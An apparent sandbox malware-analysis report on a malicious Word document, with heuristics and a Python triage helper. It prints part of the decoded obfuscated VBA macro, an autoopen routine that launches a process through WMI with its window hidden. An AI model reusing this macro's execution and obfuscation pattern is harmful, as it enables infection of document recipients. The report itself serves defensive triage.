Verdict: MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine runs when the document is opened and, after `On Error Resume Next`, contains only a handful of operative statements: `Set v_BGcG = GetObject(mGwAGQD.RGAADA)`, `v_BGcG.ShowWindow = 77530 - 77530` (which evaluates to 0, a hidden window), and `GetObject(mGwAGQD.Gcw1A_AC).Create <concatenated string>, EQUQAUAZ, v_BGcG, hAAAXDAA`. Everything else in the routine is padding: the `If x = y Then ... End If` blocks compare never-assigned variables and compute arithmetic whose results are never used, and any runtime error they raise (Asc of an empty Variant, division by zero) is swallowed by `On Error Resume Next`. The monikers handed to GetObject and the pieces of the command string are read from properties of the UserForm module mGwAGQD (its VB_Base attribute is of the `0{CLSID}{CLSID}` designer form), and those property values are not part of the decoded source shown below, so the exact command cannot be recovered from this preview. The shape of the calls, a startup object with its window hidden followed by a four-argument `.Create` (command line, working directory, startup object, process ID out-parameter), is consistent with WMI `Win32_ProcessStartup` / `Win32_Process.Create`, a common way for macro downloaders to launch a second-stage command so that it runs as a child of WmiPrvSE.exe rather than of WINWORD.EXE; treat this as an inference from the call structure, not a decoded string. Two of the heuristics below need qualifying: the legacy WordBasic marker fires on the AutoOpen name and adds nothing here because a full VBA project was recovered, and the only extracted URL is the DrawingML schema namespace, which is ordinary document markup rather than a download location. The ClamAV detection name 'Doc.Malware.Sagent-6902893-0' corroborates the verdict.
Heuristics (7)

- ClamAV: Doc.Malware.Sagent-6902893-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16486 bytes |

SHA-256: 9422e2643a40545281110028a30699405aece8f8521c07ade1ddf373a3d02ac5

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
If mAAAcA = oCABAxA Then
lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
If OwAAGD4_ = pAADBB Then
VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
If loZ1AQ = nxXQBkAA Then
rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
If jBxAoCUD = c4AAoDZX Then
qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
If jAooQAA = T4AA4B Then
ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
If jQQwoA = LQxBAQB Then
oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
If jAAoAx = lAA1AXGA Then
OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
If u1AAcA = nBB_UA Then
k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
If pXUXABkQ = pDGXcw4 Then
SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
If sABo4Q = dC4UD1A Then
cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
```
... (truncated)
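As an added triage example (not the analyzer's code and not part of the sample), the Python below does by script what an analyst does by hand with a module like this: it folds VBA line continuations, removes the `If a = b Then ... End If` junk-arithmetic blocks, constant-folds the `ShowWindow` assignment, lists which UserForm control properties the macro reads its strings from, and applies the same "auto-exec entry point plus an execution token" rule that the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes. `SAMPLE_VBA` is a constructed, shortened copy of the preview above with a closing `End Sub` added; the identifiers in it are the sample's own, but the token lists and the junk-block rule are my approximation of the analyzer's logic, not its implementation, and the script works on decoded source text only (it does not read p-code streams).

```python
"""Added triage helper for olevba-decoded VBA source: strip junk arithmetic
blocks, fold constants, list UserForm property reads and apply the
auto-exec + execution-token rule (source text only, no p-code parsing)."""
import re

# Constructed, shortened excerpt modelled on the report's preview (the real
# module is 16,486 bytes); End Sub is added so the excerpt is complete.
SAMPLE_VBA = """\
Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
If mAAAcA = oCABAxA Then
lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
v_BGcG.ShowWindow = 77530 - 77530
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
End Sub
"""

AUTOEXEC_RE = re.compile(r"\b(?:sub|function)\s+(autoopen|auto_open|autoexec|"
    r"autoclose|auto_close|document_open|document_close|workbook_open|workbook_close)\s*\(", re.I)
# Anchored so random identifiers such as c4AAoDZX cannot produce substring hits.
EXEC_PATTERNS = {
    "GetObject": r"\bgetobject\s*\(",
    "CreateObject": r"\bcreateobject\s*\(",
    "Shell": r'\bshell\s*[("]',
    ".Create": r"\.\s*create\b",
    "ShowWindow": r"\.\s*showwindow\s*=",
    "winmgmts": r"winmgmts:",
}
JUNK_IF = re.compile(r"^If\s+\w+\s*=\s*\w+\s+Then$", re.I)
# Numeric-only assignment: no '.' (member access), no string literal, no ':'.
JUNK_ASSIGN = re.compile(r"^\w+\s*=\s*[\w\s()+\-*/]+$")
FOLD = re.compile(r"^([\w.]+\s*=\s*)(\d+)\s*([-+*])\s*(\d+)$")

def join_continuations(src):
    """Fold VBA line continuations (trailing ' _') into single statements."""
    out, buf = [], ""
    for raw in src.splitlines():
        buf += raw.strip()
        if buf.endswith(" _"):
            buf = buf[:-1]            # drop the underscore, keep the space
        else:
            out.append(buf)
            buf = ""
    return [l for l in out if l]

def has_exec_token(text):
    return any(re.search(p, text, re.I) for p in EXEC_PATTERNS.values())

def strip_junk_blocks(lines):
    """Drop If-blocks whose bodies are only numeric assignments: under On Error
    Resume Next their errors are swallowed, so they are padding. A block that
    contains any execution token is never treated as junk."""
    kept, i = [], 0
    while i < len(lines):
        if JUNK_IF.match(lines[i]):
            j = i + 1
            while (j < len(lines) and lines[j].lower() != "end if"
                   and JUNK_ASSIGN.match(lines[j]) and not has_exec_token(lines[j])):
                j += 1
            if j < len(lines) and lines[j].lower() == "end if":
                i = j + 1
                continue
        kept.append(lines[i])
        i += 1
    return kept

def fold_constants(line):
    """Turn 'x = 77530 - 77530' into 'x = 0' so the intent is visible."""
    m = FOLD.match(line)
    if not m:
        return line
    a, op, b = int(m.group(2)), m.group(3), int(m.group(4))
    return m.group(1) + str({"-": a - b, "+": a + b, "*": a * b}[op])

def userform_modules(src):
    """Designer (UserForm) modules export VB_Base = "0{CLSID}{CLSID}"."""
    return re.findall(r'Attribute VB_Name = "(\w+)"\r?\nAttribute VB_Base = "0\{', src)

def form_property_refs(lines, forms):
    if not forms:
        return []
    pat = re.compile(r"\b(" + "|".join(map(re.escape, forms)) + r")\.(\w+)")
    refs = [f"{mod}.{prop}" for line in lines for mod, prop in pat.findall(line)]
    return list(dict.fromkeys(refs))   # de-duplicate, keep first-seen order

def triage(src):
    lines = join_continuations(src)
    operative = [fold_constants(l) for l in strip_junk_blocks(lines)
                 if not l.startswith("Attribute ")]
    text = "\n".join(operative)
    autoexec = [m.lower() for m in AUTOEXEC_RE.findall(text)]
    tokens = [name for name, p in EXEC_PATTERNS.items() if re.search(p, text, re.I)]
    return {"autoexec": autoexec, "exec_tokens": tokens,
            "form_refs": form_property_refs(lines, userform_modules(src)),
            "operative": operative,
            # same rule as OLE_VBA_PCODE_AUTOEXEC_EXEC: entry point + execution token
            "flag": bool(autoexec and tokens)}

if __name__ == "__main__":
    r = triage(SAMPLE_VBA)
    print(r["flag"], r["autoexec"], r["exec_tokens"], r["form_refs"], "\n".join(r["operative"]), sep="\n")
```

Run it over the full macros.bas carved by olevba rather than the excerpt: the operative-statement listing is what belongs in a triage note, and the form_refs list names the UserForm control properties whose values (the GetObject monikers and the command-string fragments) have to be pulled from the form storage, which olevba's form-string extraction reports separately from the macro source, before the launched command can be stated with certainty.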